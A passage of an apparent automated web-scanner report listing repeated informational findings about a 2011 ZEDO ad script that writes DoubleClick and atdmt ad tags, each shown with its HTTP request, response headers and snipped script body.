Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.18763553122576554 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=55:66:56:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=57:55:66:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=151
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:07 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=57%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=57%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.147. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7952332795167094 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=46:51:46:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=47:46:51:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=108
Expires: Sun, 24 Apr 2011 16:51:54 GMT
Date: Sun, 24 Apr 2011 16:50:06 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=47%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=47%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.148. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.684267982429325 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=36:38:36:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:0,1,1:2,1,1:1,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=37:36:38:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=49
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:32 GMT
Connection: close
Content-Length: 2694

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587468/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=935452%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=37%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=37%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.149. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.7873504462599064 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=16:14:14:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898|2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:1,1,1:0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:11 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=15:16:14:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=130
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:11 GMT
Connection: close
Content-Length: 2114

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3271.dogtimemedia.com/B5314413.10;sz=300x250;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=921885%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=15%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=15%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.150. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.5203394870107549 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=33:33:32:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:1,1,1:1,1,1:2,1,1:0,1,1:2,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=33:33:33:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:49:15 GMT
Connection: close
Content-Length: 2097

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28;sz=300x250;click=http://yads.zedo.com/ads2/c?a=934268%3Bn=809%3Bx=2325%3Bc=809001050,809001050%3Bg=172%3Bi=33%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=33%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

23.151. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.2558464802007878 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=1:1:1:None; FFCap=1574B809,210132,210841|0,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841|1,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:51 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:1:1:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=210
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:51 GMT
Connection: close
Content-Length: 2684

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931213%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=2%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=2%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.152. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.20927466834210856 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFgeo=2241452; FFad=68:58:56:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129,208216|2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:5,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:2,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=57:68:58:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=148
Expires: Sun, 24 Apr 2011 16:53:38 GMT
Date: Sun, 24 Apr 2011 16:51:10 GMT
Connection: close
Content-Length: 2714

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=934861%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=57%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=57%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.153. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.5753438082553435 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,21; FFad=1:1:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210841,210133,210132|0,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:46:07 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:1:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=255
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:46:07 GMT
Connection: close
Content-Length: 2684

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587473/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931213%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=0%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=xlO0TcGt89Z-t7Q0A2jzc9p9~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.154. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8272187158910633 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21; FFgeo=2241452; FFad=20:22:20:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226,210129|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:28 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=21:22:20:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:28 GMT
Connection: close
Content-Length: 2680

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/UNY/iview/312587464/direct/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=931208%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=21%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=21%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

23.155. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=9&q=&$=&s=376&z=0.8933249285461247 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21; FFgeo=2241452; FFad=22:20:19:None; FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:1,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1; ZEDOIDA=9lO0TcGt89btIYJEUz5hJCkQ~042411; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1574B809,210132,210841,210128,204732,204731,210133,210175,210174,209524,208227,209522,208218,203040,207898,209526,207897,208226|2,1,1:2,1,1:2,1,1:1,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:2,1,1:0,1,1:2,1,1:0,1,1:1,1,1:1,1,1:0,1,1;expires=Tue, 24 May 2011 16:48:28 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=809,1050,9:809,1050,7:809,1050,3:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=20:22:20:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:48:28 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...
</span>")
